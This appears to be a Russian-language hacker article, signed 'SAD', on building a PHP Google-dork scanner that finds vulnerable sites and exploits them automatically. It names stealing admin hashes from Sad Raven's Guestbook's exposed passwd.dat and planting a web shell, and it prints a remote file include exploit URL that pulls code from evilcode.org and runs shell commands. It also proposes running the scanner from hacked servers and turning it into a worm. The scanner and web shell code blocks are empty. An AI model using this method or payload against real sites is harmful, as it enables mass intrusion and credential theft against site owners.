|
|
 |
 |
 |
|
Пишем google-сканнер на PHP
|
|
 |
 |
 |
|
|
 |
 |
 |
|
Здравствуйте, я хочу Вам рассказать, как можно самому сделать гугл-сканнер
на php. Написать эту статью я решил потому, что не видел в нете ничего подобного.
Если кто видел что-нибудь похожее, сообщите об этом мне.
"Почему именно на php?", - спросите Вы. Да потому что этот скрипт можно
будет залить на любой взломанный сервак и выполнить там. Да и вообще я считаю,
что будущее за php.
Во-первых, давайте разберемся, что конкретно мы хотим сделать.
1) из результатов поиска (бажного скрипта, например) нам нужно выдрать все ссылки
и записать их в файл/ вывести на экран (хотя бы в целях отладки);
2) затем нам нужно качественно отфильтровать левые ссылки - это, на мой взгляд,
самое сложное;
3) далее нужно пройтись по каждой отфильтрованной ссылке по отдельности и
попробовать применить эксплоит;
4) если он сработал, то пишем это это в лог.
В качестве скрипта для своих экспериментов я взял Sad Raven's Guestbook. В
самой гостевой книге багов мною найдено не было, но проблема в том, что админские
логин и md5-хэш пароля она хранит в файле "passwd.dat" и достаточно часто к нему
забывают запретить доступ. А через админ. центр в разделе "дизайн" можно сделать
себе простенький веб-шелл вроде этого:
Ну что ж, приступим =)
=======begin PhpGoogleScanner.php source code=======
=======end of PhpGoogleScanner.php source code=======
Эксплоит для скриптов с include-багом мог бы выглядеть следующим образом:
buggy_script.php?page=http://www.evilcode.org/c.txt?c=pwd;id;other_commands_here
Конечно это сработает только при allow_url_fopen = 1.
Также можно подправить сканнер, чтобы он искал и эксплуатировал уязвимости типа sql-injection.
А если очень постараться, то доработав этот исходник можно сделать и какого-нибудь злого червя >=)
В общем много чего еще можно придумать, лишь бы фантазии и знаний хватило.
Пока это все, удачи.
Автор:
SAD
|
|
 |
 |
 |
|
|